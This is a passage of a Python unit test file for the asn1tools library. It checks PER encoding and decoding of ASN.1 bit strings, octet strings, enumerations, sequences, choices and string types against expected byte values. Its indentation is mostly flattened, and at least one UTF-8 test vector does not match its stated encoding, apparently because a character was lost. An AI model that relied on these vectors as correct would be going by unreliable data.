"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= BIT STRING "
"B ::= BIT STRING (SIZE (9)) "
"C ::= BIT STRING (SIZE (5..7)) "
"D ::= SEQUENCE { "
" a BOOLEAN, "
" b BIT STRING "
"} "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" b BIT STRING (SIZE(1)), "
" c BIT STRING (SIZE(16)) "
"} "
"F ::= BIT STRING { "
" a (0), "
" b (1), "
" c (2) "
"} "
"G ::= SEQUENCE { "
" a BIT STRING, "
" b BOOLEAN "
"} "
"H ::= SEQUENCE SIZE (0..2) OF BIT STRING (SIZE(1..255)) "
"I ::= SEQUENCE SIZE (0..2) OF BIT STRING (SIZE(1..256)) "
"J ::= SEQUENCE SIZE (0..2) OF BIT STRING (SIZE(2..256)) "
"K ::= SEQUENCE SIZE (0..2) OF BIT STRING (SIZE(2..257)) "
"L ::= BIT STRING (SIZE (1..160, ...)) "
"M ::= SEQUENCE { "
" a BOOLEAN, "
" b BIT STRING (SIZE (1..160, ...)) "
"} "
"N ::= BIT STRING (SIZE(0..65535)) "
"O ::= BIT STRING (SIZE(0..65536)) "
"END",
'per')
datas = [
('A', (b'\x40', 4), b'\x04\x40'),
('A',
(299 * b'\x55' + b'\x54', 2399),
b'\x89\x5f' + 299 * b'\x55' + b'\x54'),
('A',
(2048 * b'\x55', 16384),
b'\xc1' + 2048 * b'\x55' + b'\x00'),
('B', (b'\x12\x80', 9), b'\x12\x80'),
('C', (b'\x34', 6), b'\x40\x34'),
('D', {'a': True, 'b': (b'\x40', 4)}, b'\x80\x04\x40'),
('E',
{'a': True, 'b': (b'\x80', 1), 'c': (b'\x7f\x01', 16)},
b'\xdf\xc0\x40'),
('F', (b'\x80', 1), b'\x01\x80'),
('F', (b'\xe0', 3), b'\x03\xe0'),
('F', (b'\x01', 8), b'\x08\x01'),
('G', {'a': (b'\x80', 2), 'b': True}, b'\x02\xa0'),
('G', {'a': (b'', 0), 'b': True}, b'\x00\x80'),
('H', [(b'\x40', 2)], b'\x40\x40\x40'),
('I', [(b'\x40', 2)], b'\x40\x01\x40'),
('J', [(b'\x40', 2)], b'\x40\x00\x40'),
('K', [(b'\x40', 2)], b'\x40\x00\x40'),
('L', (b'\x80', 1), b'\x00\x00\x80'),
('M', {'a': True, 'b': (b'\xe0', 3)}, b'\x80\x80\xe0'),
('N', (b'', 0), b'\x00\x00'),
('O', (b'', 0), b'\x00')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
# Trailing zero bits should be stripped when encoding named
# bit list. Default value is not encoded, but part of
# decoded. Also ignore dangling bits.
datas = [
('F', (b'\x80', 2), b'\x01\x80', (b'\x80', 1)),
('F', (b'\x40', 3), b'\x02\x40', (b'\x40', 2)),
('F', (b'\x00', 3), b'\x00', (b'', 0)),
('F', (b'\x00', 8), b'\x00', (b'', 0))
]
for type_name, decoded_1, encoded, decoded_2 in datas:
self.assertEqual(foo.encode(type_name, decoded_1), encoded)
self.assertEqual(foo.decode(type_name, encoded), decoded_2)
def test_octet_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= OCTET STRING "
"B ::= OCTET STRING (SIZE (2)) "
"C ::= OCTET STRING (SIZE (3)) "
"D ::= OCTET STRING (SIZE (3..7)) "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" b OCTET STRING "
"} "
"F ::= SEQUENCE { "
" a BOOLEAN, "
" b OCTET STRING (SIZE(1)), "
" c OCTET STRING (SIZE(2)) "
"} "
"G ::= SEQUENCE { "
" a BOOLEAN, "
" b OCTET STRING (SIZE(3)) "
"} "
"H ::= OCTET STRING (SIZE (65535)) "
"I ::= OCTET STRING (SIZE (65536)) "
"J ::= OCTET STRING (SIZE (1..MAX)) "
"K ::= OCTET STRING (SIZE (MIN..5)) "
"L ::= OCTET STRING (SIZE (1..2, ...)) "
"M ::= SEQUENCE SIZE (0..2) OF OCTET STRING (SIZE(1..255)) "
"N ::= SEQUENCE SIZE (0..2) OF OCTET STRING (SIZE(1..256)) "
"O ::= SEQUENCE SIZE (0..2) OF OCTET STRING (SIZE(2..256)) "
"P ::= SEQUENCE SIZE (0..2) OF OCTET STRING (SIZE(2..257)) "
"END",
'per')
datas = [
('A', b'\x00', b'\x01\x00'),
('A', 500 * b'\x00', b'\x81\xf4' + 500 * b'\x00'),
('B', b'\xab\xcd', b'\xab\xcd'),
('C', b'\xab\xcd\xef', b'\xab\xcd\xef'),
('D', b'\x89\xab\xcd\xef', b'\x20\x89\xab\xcd\xef'),
('E', {'a': True, 'b': b'\x00'}, b'\x80\x01\x00'),
('E', {'a': True, 'b': b'\x00\x01\x02'}, b'\x80\x03\x00\x01\x02'),
('F',
{'a': True, 'b': b'\x12', 'c': b'\x34\x56'},
b'\x89\x1a\x2b\x00'),
('G', {'a': True, 'b': b'\x00\x01\x02'}, b'\x80\x00\x01\x02'),
('H', 32767 * b'\x01\x02' + b'\x01', 32767 * b'\x01\x02' + b'\x01'),
('I',
32768 * b'\x01\x02',
b'\xc4' + 32768 * b'\x01\x02'
+ b'\x00'),
('A',
4095 * b'\x00\x01\x02\x03' + b'\x00\x01\x02',
b'\xbf\xff' + 4095 * b'\x00\x01\x02\x03' + b'\x00\x01\x02'),
('A',
4095 * b'\x00\x01\x02\x03' + b'\x00\x01\x02\x03',
b'\xc1' + 4095 * b'\x00\x01\x02\x03' + b'\x00\x01\x02\x03'
+ b'\x00'),
('A',
4095 * b'\x00\x01\x02\x03' + b'\x00\x01\x02\x03\x00',
b'\xc1' + 4095 * b'\x00\x01\x02\x03' + b'\x00\x01\x02\x03'
+ b'\x01' + b'\x00'),
('J', b'\x12', b'\x01\x12'),
('K', b'', b'\x00'),
('L', b'\x12\x34', b'\x40\x12\x34'),
('L', b'\x12\x34\x56', b'\x80\x03\x12\x34\x56'),
('M', [b'\x12\x34'], b'\x40\x40\x12\x34'),
('M', [b'\x12\x34\x56\x78'], b'\x40\xc0\x12\x34\x56\x78'),
('N', [b'\x12\x34'], b'\x40\x01\x12\x34'),
('N', [b'\x12\x34\x56\x78'], b'\x40\x03\x12\x34\x56\x78'),
('O', [b'\x12\x34\x56'], b'\x40\x40\x12\x34\x56'),
('O', [b'\x12\x34\x56\x78'], b'\x40\x80\x12\x34\x56\x78'),
('P', [b'\x12\x34\x56'], b'\x40\x01\x12\x34\x56'),
('P', [b'\x12\x34\x56\x78'], b'\x40\x02\x12\x34\x56\x78')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_object_identifier(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= OBJECT IDENTIFIER "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b OBJECT IDENTIFIER "
"} "
"END",
'per')
datas = [
('A', '1.2', b'\x01\x2a'),
('A', '1.2.3321', b'\x03\x2a\x99\x79'),
('B', {'a': True, 'b': '1.2'}, b'\x80\x01\x2a')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_external(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= EXTERNAL "
"END",
'per')
datas = [
('A', {'encoding': ('octet-aligned', b'\x12')}, b'\x08\x01\x12')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_enumerated(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= ENUMERATED { one(1) } "
"B ::= ENUMERATED { zero(0), one(1), ... } "
"C ::= ENUMERATED { one(1), four(4), two(2), ..., six(6), nine(9) } "
"D ::= ENUMERATED { a, ..., "
"aa, ab, ac, ad, ae, af, ag, ah, ai, aj, ak, al, am, an, ao, ap, "
"aq, ar, as, at, au, av, aw, ax, ay, az, ba, bb, bc, bd, be, bf, "
"bg, bh, bi, bj, bk, bl, bm, bn, bo, bp, bq, br, bs, bt, bu, bv, "
"bw, bx, by, bz, ca, cb, cc, cd, ce, cf, cg, ch, ci, cj, ck, cl, "
"cm, cn, co, cp, cq, cr, cs, ct, cu, cv, cw, cx, cy, cz, da, db, "
"dc, dd, de, df, dg, dh, di, dj, dk, dl, dm, dn, do, dp, dq, dr, "
"ds, dt, du, dv, dw, dx, dy, dz, ea, eb, ec, ed, ee, ef, eg, eh, "
"ei, ej, ek, el, em, en, eo, ep, eq, er, es, et, eu, ev, ew, ex, "
"ey, ez, fa, fb, fc, fd, fe, ff, fg, fh, fi, fj, fk, fl, fm, fn, "
"fo, fp, fq, fr, fs, ft, fu, fv, fw, fx, fy, fz, ga, gb, gc, gd, "
"ge, gf, gg, gh, gi, gj, gk, gl, gm, gn, go, gp, gq, gr, gs, gt, "
"gu, gv, gw, gx, gy, gz, ha, hb, hc, hd, he, hf, hg, hh, hi, hj, "
"hk, hl, hm, hn, ho, hp, hq, hr, hs, ht, hu, hv, hw, hx, hy, hz, "
"ia, ib, ic, id, ie, if, ig, ih, ii, ij, ik, il, im, in, io, ip, "
"iq, ir, is, it, iu, iv, iw, ix, iy, iz, ja, jb, jc, jd, je, jf, "
"jg, jh, ji, jj, jk, jl, jm, jn, jo, jp, jq, jr, js, jt, ju, jv, "
"jw, jx, jy, jz } "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" b B "
"} "
"F ::= SEQUENCE {"
" a ENUMERATED { zero(0), one(1) } DEFAULT one"
"}"
"END",
'per')
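        # Root values are encoded as an index constrained to the root
        # enumeration, while extension additions set the leading extension
        # bit and encode their index as a normally small non-negative number.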
datas = [
('A', 'one', b''),
('B', 'zero', b'\x00'),
('B', 'one', b'\x40'),
('C', 'one', b'\x00'),
('C', 'two', b'\x20'),
('C', 'four', b'\x40'),
('C', 'six', b'\x80'),
('C', 'nine', b'\x81'),
('D', 'aa', b'\x80'),
('D', 'cl', b'\xbf'),
('D', 'cm', b'\xc0\x50\x00'),
('D', 'jv', b'\xc0\x7f\xc0'),
('D', 'jw', b'\xc0\x80\x40\x00'),
('D', 'jz', b'\xc0\x80\x40\xc0'),
('E', {'a': True, 'b': 'zero'}, b'\x80'),
('E', {'a': True, 'b': 'one'}, b'\xa0'),
('F', {'a': 'zero'}, b'\x80'),
            ('F', {'a': 'one'}, b'\x00')
        ]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
        # The default value is not encoded, but it is part of the decoded result.
datas = [
('F', {}, b'\x00', {'a': 'one'})
]
for type_name, decoded_1, encoded_1, decoded_2 in datas:
self.assertEqual(foo.encode(type_name, decoded_1), encoded_1)
self.assertEqual(foo.decode(type_name, encoded_1), decoded_2)
# Bad root index.
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('C', b'\x70')
self.assertEqual(str(cm.exception),
"C: Expected enumeration index 0, 1 or 2, but got 3.")
        # An unknown additions index decodes to None.
self.assertEqual(foo.decode('C', b'\x8f'), None)
def test_sequence(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= SEQUENCE {} "
"B ::= SEQUENCE { "
" a INTEGER DEFAULT 0 "
"} "
"C ::= SEQUENCE { "
" a BOOLEAN, "
" ... "
"} "
"D ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN "
" ]] "
"} "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN "
" ]], "
" ... "
"} "
"F ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN "
" ]], "
" ..., "
" c BOOLEAN "
"} "
"G ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN "
" ]], "
" [[ "
" c BOOLEAN "
" ]], "
" ..., "
" d BOOLEAN "
"} "
"H ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" ... "
"} "
"I ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" b BOOLEAN "
"} "
"J ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" b BOOLEAN OPTIONAL "
"} "
"K ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" b BOOLEAN, "
" c BOOLEAN "
"} "
"L ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN, "
" c BOOLEAN "
" ]] "
"} "
"M ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b SEQUENCE { "
" a INTEGER"
" } OPTIONAL, "
" c BOOLEAN "
" ]] "
"} "
"N ::= SEQUENCE { "
" a BOOLEAN DEFAULT TRUE "
"} "
"O ::= SEQUENCE { "
" ..., "
" a BOOLEAN DEFAULT TRUE "
"} "
"P ::= SEQUENCE { "
" ..., "
" [[ "
" a BOOLEAN, "
" b BOOLEAN DEFAULT TRUE "
" ]] "
"} "
"Q ::= SEQUENCE { "
" a C, "
" b INTEGER "
"} "
"R ::= SEQUENCE { "
" a D, "
" b INTEGER "
"} "
"S ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" b SEQUENCE { "
" a BOOLEAN, "
" b BOOLEAN OPTIONAL, "
" ... "
" } "
"} "
"T ::= SEQUENCE { "
" a SEQUENCE OF T OPTIONAL "
"} "
"U ::= SEQUENCE { "
" ..., "
" a SEQUENCE { "
" a INTEGER "
" } "
"} "
"V ::= SEQUENCE { "
" ..., "
" a OCTET STRING, "
" b INTEGER "
"} "
"W ::= SEQUENCE { "
" a BOOLEAN, "
" ..., "
" b NULL "
"} "
"END",
'per')
datas = [
('A', {}, b''),
('O', {}, b'\x00'),
('B', {'a': 0}, b'\x00'),
('B', {'a': 1}, b'\x80\x01\x01'),
('C', {'a': True}, b'\x40'),
('D', {'a': True}, b'\x40'),
('E', {'a': True}, b'\x40'),
('H', {'a': True}, b'\x40'),
('I', {'a': True}, b'\x40'),
('J', {'a': True}, b'\x40'),
('K', {'a': True}, b'\x40'),
('L', {'a': True}, b'\x40'),
('M', {'a': True}, b'\x40'),
('N', {'a': True}, b'\x00'),
('N', {'a': False}, b'\x80'),
('P', {}, b'\x00'),
('O', {'a': True}, b'\x80\x80\x01\x80'),
('O', {'a': False}, b'\x80\x80\x01\x00'),
('P', {'a': True, 'b': True}, b'\x80\x80\x01\x40'),
('P', {'a': True, 'b': False}, b'\x80\x80\x01\xc0'),
('D', {'a': True, 'b': True}, b'\xc0\x40\x01\x80'),
('E', {'a': True, 'b': True}, b'\xc0\x40\x01\x80'),
('F', {'a': True, 'c': True}, b'\x60'),
('G', {'a': True, 'd': True}, b'\x60'),
('I', {'a': True, 'b': True}, b'\xc0\x40\x01\x80'),
('J', {'a': True, 'b': True}, b'\xc0\x40\x01\x80'),
('K', {'a': True, 'b': True}, b'\xc0\xc0\x01\x80'),
('F', {'a': True, 'b': True, 'c': True}, b'\xe0\x20\x01\x80'),
('K', {'a': True, 'b': True, 'c': True}, b'\xc0\xe0\x01\x80\x01\x80'),
('L', {'a': True, 'b': True, 'c': True}, b'\xc0\x40\x01\xc0'),
('G', {'a': True, 'b': True, 'd': True}, b'\xe0\x60\x01\x80'),
('G',
{'a': True, 'b': True, 'c': True, 'd': True},
b'\xe0\x70\x01\x80\x01\x80'),
('M',
{'a': True, 'b': {'a': 5}, 'c': True},
b'\xc0\x40\x04\x80\x01\x05\x80'),
('Q', {'a': {'a': True}, 'b': 100}, b'\x40\x01\x64'),
('R',
{'a': {'a': True, 'b': True}, 'b': 100},
b'\xc0\x40\x01\x80\x01\x64'),
('S',
{'a': True, 'b': {'a': True, 'b': True}},
b'\xc0\x40\x01\x70'),
('T', {'a': [{}]}, b'\x80\x01\x00'),
('T', {'a': [{'a': []}]}, b'\x80\x01\x80\x00'),
('V',
{'a': 5000 * b'\x00', 'b': 1000},
b'\x81\xc0\x93\x8a\x93\x88' + 5000 * b'\x00' + b'\x03\x02\x03\xe8'),
('W', {'a': True, 'b': None},
b'\xc0\x40\x00')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
        # Encoding and decoding are not symmetrical because default values
        # are never encoded, but they do appear in the decoded result (for
        # root members always, and for addition members when the addition
        # group is present).
self.assertEqual(foo.encode('N', {}), b'\x00')
self.assertEqual(foo.decode('N', b'\x00'), {'a': True})
self.assertEqual(foo.encode('P', {'a': True}), b'\x80\x80\x01\x40')
self.assertEqual(foo.decode('P', b'\x80\x80\x01\x40'),
{'a': True, 'b': True})
        # Decode D as C. Extension addition "b" should be skipped.
self.assertEqual(foo.decode('C', b'\xc0\x40\x01\x80'), {'a': True})
# Decode R as Q. Extension addition "a.b" should be skipped.
self.assertEqual(foo.decode('Q', b'\xc0\x40\x01\x80\x01\x64'),
{'a': {'a': True}, 'b': 100})
# Decode error of present addition member (out of data).
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('U', b'\x80\x80\x03\x02\x05')
self.assertEqual(str(cm.exception),
'U.a.a: out of data (At bit offset: 32)')
# Missing root member.
with self.assertRaises(asn1tools.EncodeError) as cm:
foo.encode('K', {'b': True})
self.assertEqual(str(cm.exception),
"K: Sequence member 'a' not found in {'b': True}.")
def test_sequence_of(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= SEQUENCE OF INTEGER "
"B ::= SEQUENCE SIZE (2) OF INTEGER "
"C ::= SEQUENCE SIZE (1..5) OF INTEGER "
"D ::= SEQUENCE SIZE (1..2, ...) OF INTEGER "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" b SEQUENCE OF INTEGER "
"} "
"F ::= SEQUENCE { "
" a BOOLEAN, "
" b SEQUENCE SIZE(1) OF INTEGER "
"} "
"G ::= SEQUENCE SIZE (1..2, ..., 6..7) OF INTEGER "
"H ::= SEQUENCE SIZE (1..MAX) OF INTEGER "
"I ::= SEQUENCE SIZE (1..10000) OF OCTET STRING "
"END",
'per')
datas = [
('A', [], b'\x00'),
('A', [1], b'\x01\x01\x01'),
('A', [1, 2], b'\x02\x01\x01\x01\x02'),
('A', 1000 * [1, 2], b'\x87\xd0' + 1000 * b'\x01\x01\x01\x02'),
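            # Item counts of 16384 or more use PER length-determinant
            # fragmentation: a 0xC1-0xC4 prefix carries 1-4 blocks of 16384
            # items, followed by a length determinant for the remaining items.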
('A', 16384 * [1], b'\xc1' + 16384 * b'\x01\x01' + b'\x00'),
('A',
65535 * [1],
b'\xc3' + 49152 * b'\x01\x01' + b'\xbf\xff' + 16383 * b'\x01\x01'),
('A',
100000 * [1],
b'\xc4' + 65536 * b'\x01\x01'
+ b'\xc2' + 32768 * b'\x01\x01'
+ b'\x86\xa0' + 1696 * b'\x01\x01'),
('B', [1, 2], b'\x01\x01\x01\x02'),
('B', [4663, 222322233], b'\x02\x12\x37\x04\x0d\x40\x5e\x39'),
('C', [1], b'\x00\x01\x01'),
('C', [1, 2], b'\x20\x01\x01\x01\x02'),
('D', [2, 1], b'\x40\x01\x02\x01\x01'),
('E', {'a': False, 'b': []}, b'\x00\x00'),
('E', {'a': False, 'b': [1]}, b'\x00\x01\x01\x01'),
('F', {'a': False, 'b': [1]}, b'\x00\x01\x01'),
('G',
6 * [1],
b'\x80\x06\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01'),
('H', [1], b'\x01\x01\x01'),
('I', 300 * [b'\x56'], b'\x01\x2b' + 300 * b'\x01\x56')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_choice(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= CHOICE { "
" a BOOLEAN "
"} "
"B ::= CHOICE { "
" a BOOLEAN, "
" ... "
"} "
"C ::= CHOICE { "
" a BOOLEAN, "
" b INTEGER, "
" ..., "
" [[ "
" c BOOLEAN "
" ]] "
"} "
"D ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN "
" ]], "
" ... "
"} "
"E ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN "
" ]], "
" [[ "
" c BOOLEAN "
" ]], "
" ... "
"} "
"F ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" ... "
"} "
"G ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" b BOOLEAN "
"} "
"H ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" b BOOLEAN, "
" c BOOLEAN "
"} "
"I ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b BOOLEAN, "
" c BOOLEAN "
" ]] "
"} "
"J ::= CHOICE { "
" a BOOLEAN, "
" ..., "
" [[ "
" b CHOICE { "
" a INTEGER"
" }, "
" c BOOLEAN "
" ]] "
"} "
"K ::= CHOICE { "
" a BOOLEAN, "
" b BOOLEAN, "
" c BOOLEAN, "
" ..., "
" d BOOLEAN, "
" e BOOLEAN, "
" f BOOLEAN, "
" g BOOLEAN, "
" h BOOLEAN "
"} "
"L ::= CHOICE { "
" a BOOLEAN, "
" b BOOLEAN, "
" c BOOLEAN, "
" ..., "
" d BOOLEAN, "
" e BOOLEAN, "
" f BOOLEAN, "
" g BOOLEAN, "
" h BOOLEAN, "
" i BOOLEAN "
"} "
"END",
'per')
datas = [
('A', ('a', True), b'\x80'),
('B', ('a', True), b'\x40'),
('C', ('a', True), b'\x20'),
('C', ('b', 1), b'\x40\x01\x01'),
('C', ('c', True), b'\x80\x01\x80'),
('D', ('a', True), b'\x40'),
('D', ('b', True), b'\x80\x01\x80'),
('E', ('a', True), b'\x40'),
('E', ('b', True), b'\x80\x01\x80'),
('E', ('c', True), b'\x81\x01\x80'),
('F', ('a', True), b'\x40'),
('G', ('a', True), b'\x40'),
('G', ('b', True), b'\x80\x01\x80'),
('H', ('a', True), b'\x40'),
('H', ('b', True), b'\x80\x01\x80'),
('H', ('c', True), b'\x81\x01\x80'),
('I', ('a', True), b'\x40'),
('I', ('b', True), b'\x80\x01\x80'),
('I', ('c', True), b'\x81\x01\x80'),
('J', ('a', True), b'\x40'),
('J', ('b', ('a', 1)), b'\x80\x02\x01\x01'),
('J', ('c', True), b'\x81\x01\x80'),
('L', ('i', True), b'\x85\x01\x80')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
# Bad root index.
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('K', b'\x70')
self.assertEqual(str(cm.exception),
"K: Expected choice index 0, 1 or 2, but got 3.")
# Bad additions index becomes None.
decoded = foo.decode('K', b'\x85\x01\x80')
self.assertEqual(decoded, (None, None))
# Bad value.
with self.assertRaises(asn1tools.EncodeError) as cm:
foo.encode('K', ('i', True), check_types=False)
self.assertEqual(
str(cm.exception),
"K: Expected choice 'a', 'b', 'c', 'd', 'e', 'f', 'g' or 'h', but "
"got 'i'.")
# Bad value.
with self.assertRaises(asn1tools.EncodeError) as cm:
foo.encode('A',
('b', True),
check_types=False,
check_constraints=False)
self.assertEqual(str(cm.exception), "A: Expected choice 'a', but got 'b'.")
def test_utf8_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= SEQUENCE { "
" a BOOLEAN, "
" b UTF8String, "
" c UTF8String OPTIONAL"
"} "
"B ::= UTF8String (SIZE (10)) "
"C ::= UTF8String (SIZE (0..1)) "
"D ::= UTF8String (SIZE (2..3) ^ (FROM (\"a\"..\"g\"))) "
"E ::= UTF8String "
"END",
'per')
datas = [
('A', {'a': True, 'b': u''}, b'\x40\x00'),
('A',
{'a': True, 'b': u'1', 'c': u'foo'},
b'\xc0\x01\x31\x03\x66\x6f\x6f'),
('A',
{'a': True, 'b': 300 * u'1'},
b'\x40\x81\x2c' + 300 * b'\x31'),
('B',
u'1234567890',
b'\x0a\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30'),
('C', u'', b'\x00'),
('C', u'P', b'\x01\x50'),
('D', u'agg', b'\x03\x61\x67\x67'),
('E', u'bar', b'\x03\x62\x61\x72'),
('E', u'a\u1010c', b'\x05\x61\xe1\x80\x90\x63'),
('E',
15000 * u'123' + u'\u1010',
b'\xc2' + 10922 * b'123' + b'12\xaf\xcb3' + 4077 * b'123'
+ b'\xe1\x80\x90'),
('E', u'1Q', b'\x06\x31\xf0\x90\x88\x83\x51')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
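        # Only 0xC1-0xC4 are valid fragmentation prefixes for the length
        # determinant; 0xC5 is rejected.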
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('A', b'\x40\xc5\x00\x00\x00\x00')
self.assertEqual(str(cm.exception),
'A.b: Bad length determinant fragmentation value 0xc5.')
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('A', b'\x40\xc1\x00\x00\x00\x00')
self.assertEqual(str(cm.exception),
'A.b: out of data (At bit offset: 16)')
def test_numeric_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= NumericString (FROM (\"0\"..\"2\", ..., \"4\"..\"5\")) "
"B ::= NumericString (SIZE (1..4)) "
"C ::= NumericString (SIZE (1..4, ...)) "
"D ::= NumericString (SIZE (1..4, ..., 6..7)) "
"E ::= NumericString (SIZE (0..MAX)) "
"F ::= NumericString (SIZE (2..MAX)) "
"END",
'per')
datas = [
('A', '2', b'\x01\x30'),
('B', '1234', b'\xc0\x23\x45'),
('C', '1234', b'\x60\x23\x45'),
('D', '1234', b'\x60\x23\x45'),
('E', '', b'\x00'),
('F', '345', b'\x03\x45\x60')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
# Encode size extension is not yet supported.
with self.assertRaises(NotImplementedError) as cm:
foo.encode('D', '123456')
self.assertEqual(
str(cm.exception),
"String size extension is not yet implemented.")
# Decode size extension is not yet supported.
with self.assertRaises(NotImplementedError) as cm:
foo.decode('D', b'\x80\x06\x23\x45\x67')
self.assertEqual(
str(cm.exception),
"String size extension is not yet implemented.")
def test_printable_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"D ::= SEQUENCE { "
" a BOOLEAN, "
" b PrintableString (SIZE (36)), "
" c BOOLEAN "
"} "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" b PrintableString (SIZE (0..22)), "
" c BOOLEAN "
"} "
"F ::= SEQUENCE { "
" a BOOLEAN, "
" b PrintableString, "
" c BOOLEAN "
"} "
"END",
'per')
datas = [
('D',
{'a': True, 'b': 12 * '123', 'c': True},
b'\x80\x31\x32\x33\x31\x32\x33\x31\x32\x33\x31\x32\x33\x31\x32\x33'
b'\x31\x32\x33\x31\x32\x33\x31\x32\x33\x31\x32\x33\x31\x32\x33\x31'
b'\x32\x33\x31\x32\x33\x80'),
('E',
{'a': True, 'b': '', 'c': True},
b'\x82'),
('E',
{'a': True, 'b': '1', 'c': True},
b'\x84\x31\x80'),
('F',
{'a': True, 'b': '123', 'c': True},
b'\x80\x03\x31\x32\x33\x80')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_ia5_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= IA5String "
"END",
'per')
datas = [
('A',
1638 * '1234567890' + '123',
b'\xbf\xff'
+ 1638 * b'\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30'
+ b'\x31\x32\x33'),
('A',
1638 * '1234567890' + '1234',
b'\xc1'
+ 1638 * b'\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30'
+ b'\x31\x32\x33\x34'
+ b'\x00'),
('A',
1638 * '1234567890' + '12345',
b'\xc1'
+ 1638 * b'\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30'
+ b'\x31\x32\x33\x34'
+ b'\x01'
+ b'\x35')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_visible_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= VisibleString (SIZE (19..133)) "
"B ::= VisibleString (SIZE (5)) "
"C ::= VisibleString (SIZE (19..1000)) "
"D ::= SEQUENCE { "
" a BOOLEAN, "
" b VisibleString (SIZE (1)) "
"} "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" b VisibleString (SIZE (2)) "
"} "
"F ::= SEQUENCE { "
" a BOOLEAN, "
" b VisibleString (SIZE (3)) "
"} "
"G ::= SEQUENCE { "
" a BOOLEAN, "
" b VisibleString (SIZE (0..1)) "
"} "
"H ::= SEQUENCE { "
" a BOOLEAN, "
" b VisibleString (SIZE (0..2)) "
"} "
"I ::= VisibleString (FROM (\"a\"..\"z\")) (SIZE (1..255)) "
"J ::= VisibleString (FROM (\"a\")) "
"K ::= VisibleString (FROM (\"a\"..\"a\")) "
"END",
'per')
datas = [
('A',
'HejHoppHappHippAbcde',
b'\x02\x48\x65\x6a\x48\x6f\x70\x70\x48\x61\x70\x70\x48\x69\x70\x70'
b'\x41\x62\x63\x64\x65'),
('B', 'Hejaa', b'\x48\x65\x6a\x61\x61'),
('C',
17 * 'HejHoppHappHippAbcde',
b'\x01\x41' + 17 * (b'\x48\x65\x6a\x48\x6f\x70\x70\x48\x61\x70'
b'\x70\x48\x69\x70\x70\x41\x62\x63\x64\x65')),
('D', {'a': True, 'b': '1'}, b'\x98\x80'),
